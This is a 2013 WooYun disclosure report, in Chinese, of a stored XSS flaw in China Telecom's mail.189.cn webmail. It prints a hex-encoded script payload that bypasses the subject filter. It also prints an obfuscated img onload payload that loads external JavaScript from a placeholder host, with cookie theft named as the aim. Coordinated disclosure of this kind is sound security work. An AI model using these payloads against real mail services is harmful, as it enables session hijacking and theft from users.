漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-027826
漏洞标题:中国电信mail.189.cn存储型Xss漏洞
相关厂商:中国电信
漏洞作者: J′aron
提交时间:2013-07-05 12:08
修复时间:2013-08-19 12:09
公开时间:2013-08-19 12:09
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:12
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-07-05: 细节已通知厂商并且等待厂商处理中
2013-07-09: 厂商已经确认,细节仅向厂商公开
2013-07-19: 细节向核心白帽子及相关领域专家公开
2013-07-29: 细节向普通白帽子公开
2013-08-08: 细节向实习白帽子公开
2013-08-19: 细节向公众公开
简要描述:
中国电信mail.189.cn Xss漏洞
详细说明:
首先对输入过滤进行测试,一般最开始就测试邮件内容方面:使用<script>alert(‘xss’)</script>
在主题和内容部分,填写,在输入的时候,主题地方过滤了,内容木有过滤,输入过滤不代表能XSS(很多原因),
下面开始研究主题的XSS过滤。经过一般测试,发现< >标签都已经过滤,就没测试其他标签,琢磨使用编码来测试,输入\x3C\x73\x63\x72\x69\x70\x74\x3E(<script>的编码)
发现并木有在输入过滤,那么,这说明只要输出没有过滤就能XSS到,而且在主题处的XSS,只要登录邮箱就会被xxoo,把代码补全,
然后发送给本测试账号。来试试绕过输出
给出测试代码:\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
等我们发送成功,然后同时也接受到了邮件,刷新,弹了:
绕过输入和输出了!成功XSS到。
当然弹框不是目的,存储型的危害相当大,盗取cookie或者是其他的操作才是目的,
然后自己写一段,
比如我调用的www.xxoo.com/xss.js,
我们可以使用<img标签,然后加1个onload事件去调用外部的js代码,未加密前代码为:
<img/src=”#”onload=”window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(119,119,119,46,120,120,111,111,46,99,111,109,47,120,115,115,46,106,115);document.body.appendChild(window.s)”>
然后encode。
漏洞证明:
如上。
修复方案:
我可以大胆说- -洞不是我挖的。。不懂- -你们比我还专业。
版权声明:转载请注明来源 J′aron@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2013-07-09 23:30
厂商回复:
最新状态:
暂无